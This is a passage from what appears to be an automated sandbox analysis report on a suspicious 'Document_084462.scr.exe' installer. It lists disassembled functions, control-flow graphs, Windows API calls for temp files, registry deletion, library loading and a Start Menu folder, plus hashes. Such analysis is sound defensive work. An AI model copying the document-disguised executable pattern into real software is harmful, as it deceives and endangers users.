                                                                              control_flow_graph 655 40324c-403263 656 403265 655->656 657 40326c-403275 655->657 656->657 658 403277 657->658 659 40327e-403283 657->659 658->659 660 403293-4032a0 call 403444 659->660 661 403285-40328e call 40345a 659->661 665 403432 660->665 666 4032a6-4032aa 660->666 661->660 667 403434-403435 665->667 668 4032b0-4032d6 GetTickCount 666->668 669 4033dd-4033df 666->669 672 40343d-403441 667->672 673 40343a 668->673 674 4032dc-4032e4 668->674 670 4033e1-4033e4 669->670 671 40341f-403422 669->671 670->673 677 4033e6 670->677 675 403424 671->675 676 403427-403430 call 403444 671->676 673->672 678 4032e6 674->678 679 4032e9-4032f7 call 403444 674->679 675->676 676->665 688 403437 676->688 681 4033e9-4033ef 677->681 678->679 679->665 687 4032fd-403306 679->687 684 4033f1 681->684 685 4033f3-403401 call 403444 681->685 684->685 685->665 693 403403-40340f call 405f96 685->693 690 40330c-40332c call 40693e 687->690 688->673 697 403332-403345 GetTickCount 690->697 698 4033d5-4033d7 690->698 699 403411-40341b 693->699 700 4033d9-4033db 693->700 701 403390-403392 697->701 702 403347-40334f 697->702 698->667 699->681 703 40341d 699->703 700->667 706 403394-403398 701->706 707 4033c9-4033cd 701->707 704 403351-403355 702->704 705 403357-403388 MulDiv wsprintfW call 405456 702->705 703->673 704->701 704->705 713 40338d 705->713 710 40339a-4033a1 call 405f96 706->710 711 4033af-4033ba 706->711 707->674 708 4033d3 707->708 708->673 716 4033a6-4033a8 710->716 712 4033bd-4033c1 711->712 712->690 715 4033c7 712->715 713->701 715->673 716->700 717 4033aa-4033ad 716->717 717->712
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                                                              • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                                                              • Opcode Fuzzy Hash: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                                                              • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA
                                                                              Function 00405F13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 718 405f13-405f1f 719 405f20-405f54 GetTickCount GetTempFileNameW 718->719 720 405f63-405f65 719->720 721 405f56-405f58 719->721 723 405f5d-405f60 720->723 721->719 722 405f5a 721->722 722->723
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00405F31
                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Document_084462.scr.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                                                              • nsa, xrefs: 00405F20
                                                                              • "C:\Users\user\Desktop\Document_084462.scr.exe", xrefs: 00405F13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-3143583385
                                                                              • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                              • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                                                              • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                              • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58
                                                                              Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 724 402e41-402e6a call 40625b 726 402e6f-402e73 724->726 727 402f24-402f28 726->727 728 402e79-402e7d 726->728 729 402ea2-402eb5 728->729 730 402e7f-402ea0 RegEnumValueW 728->730 732 402ede-402ee5 RegEnumKeyW 729->732 730->729 731 402f09-402f17 RegCloseKey 730->731 731->727 733 402eb7-402eb9 732->733 734 402ee7-402ef9 RegCloseKey call 4067e3 732->734 733->731 735 402ebb-402ecf call 402e41 733->735 740 402f19-402f1f 734->740 741 402efb-402f07 RegDeleteKeyW 734->741 735->734 742 402ed1-402edd 735->742 740->727 741->727 742->732
                                                                              APIs
                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseEnum$DeleteValue
                                                                              • String ID:
                                                                              • API String ID: 1354259210-0
                                                                              • Opcode ID: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                                                              • Instruction ID: 6d47fb934da24c9d717e5f7ce43986d94c12ea4066fa177ccbd406c8c521aae0
                                                                              • Opcode Fuzzy Hash: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                                                              • Instruction Fuzzy Hash: D1215A71500109BBDF129F90CE89EEF7A7DEB54348F110076F909B21A0E7B49E54AAA8
                                                                              Function 700B1777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 743 700b1777-700b17b6 call 700b1b5f 747 700b17bc-700b17c0 743->747 748 700b18d6-700b18d8 743->748 749 700b17c9-700b17d6 call 700b23e0 747->749 750 700b17c2-700b17c8 call 700b239e 747->750 755 700b17d8-700b17dd 749->755 756 700b1806-700b180d 749->756 750->749 759 700b17f8-700b17fb 755->759 760 700b17df-700b17e0 755->760 757 700b180f-700b182b call 700b25b5 call 700b15b4 call 700b1272 GlobalFree 756->757 758 700b182d-700b1831 756->758 783 700b1885-700b1889 757->783 761 700b187e-700b1884 call 700b25b5 758->761 762 700b1833-700b187c call 700b15c6 call 700b25b5 758->762 759->756 763 700b17fd-700b17fe call 700b2d83 759->763 765 700b17e8-700b17e9 call 700b2af8 760->765 766 700b17e2-700b17e3 760->766 761->783 762->783 777 700b1803 763->777 774 700b17ee 765->774 772 700b17f0-700b17f6 call 700b2770 766->772 773 700b17e5-700b17e6 766->773 782 700b1805 772->782 773->756 773->765 774->777 777->782 782->756 787 700b188b-700b1899 call 700b2578 783->787 788 700b18c6-700b18cd 783->788 793 700b189b-700b189e 787->793 794 700b18b1-700b18b8 787->794 788->748 790 700b18cf-700b18d0 GlobalFree 788->790 790->748 793->794 795 700b18a0-700b18a8 793->795 794->788 796 700b18ba-700b18c5 call 700b153d 794->796 795->794 797 700b18aa-700b18ab FreeLibrary 795->797 796->788 797->794
                                                                              APIs
                                                                                • Part of subcall function 700B1B5F: GlobalFree.KERNEL32(?), ref: 700B1DD4
                                                                                • Part of subcall function 700B1B5F: GlobalFree.KERNEL32(?), ref: 700B1DD9
                                                                                • Part of subcall function 700B1B5F: GlobalFree.KERNEL32(?), ref: 700B1DDE
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B1825
                                                                              • FreeLibrary.KERNEL32(?), ref: 700B18AB
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B18D0
                                                                                • Part of subcall function 700B239E: GlobalAlloc.KERNEL32(00000040,?), ref: 700B23CF
                                                                                • Part of subcall function 700B2770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,700B17F6,00000000), ref: 700B2840
                                                                                • Part of subcall function 700B15C6: wsprintfW.USER32 ref: 700B15F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                              • String ID:
                                                                              • API String ID: 3962662361-3916222277
                                                                              • Opcode ID: ceec7960ddf0a58340010889cc3b84f888cb30b7b389c2d9bd5715f1f13122d9
                                                                              • Instruction ID: 05f156f9bace06284eae7240be2694eb1d9e9beb337620e81e152e1ee57d1b93
                                                                              • Opcode Fuzzy Hash: ceec7960ddf0a58340010889cc3b84f888cb30b7b389c2d9bd5715f1f13122d9
                                                                              • Instruction Fuzzy Hash: 244191714002449EDB119F70DC89BCE37FBBB04B31FA44569F9079A286DFBCA98487A0
                                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                • Part of subcall function 00405925: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,00000000,000000F0), ref: 0040164D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00401640
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                                                              • API String ID: 1892508949-3207577588
                                                                              • Opcode ID: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                                                              • Instruction ID: df70cc4d1a75ed244d2a997ae4edf05539497ac8b3a7dfb8588bf84231242a1b
                                                                              • Opcode Fuzzy Hash: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                                                              • Instruction Fuzzy Hash: 2811E231504104EBCF206FA5CD4099F37B0EF25329B28493BEA11B12F1D63E4A819B5E
                                                                              Function 004020D0 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 004020FB
                                                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,770423A0), ref: 004054B1
                                                                                • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040210C
                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 00402189
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 334405425-0
                                                                              • Opcode ID: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                                                              • Instruction ID: a0686faca365a727748c0602422b19a99e1e577425e3ae8133f46283b43b75e6
                                                                              • Opcode Fuzzy Hash: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                                                              • Instruction Fuzzy Hash: 63219671600104EBCF10AFA5CE49A9E7A71AF55358F70413BF515B91E0CBBD8E829A2E
                                                                              Function 00402522 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402553
                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3356406503-0
                                                                              • Opcode ID: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                                                              • Instruction ID: ca3dd7d1b7a13d3c8a9a28b827632004175b2a1fd75c59dcebef83c1aa991e75
                                                                              • Opcode Fuzzy Hash: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                                                              • Instruction Fuzzy Hash: 00113AB1911219EBDF14DFA4DE589AEB774FF04354B20843BE402B62D0D7B88A44DB6E
                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
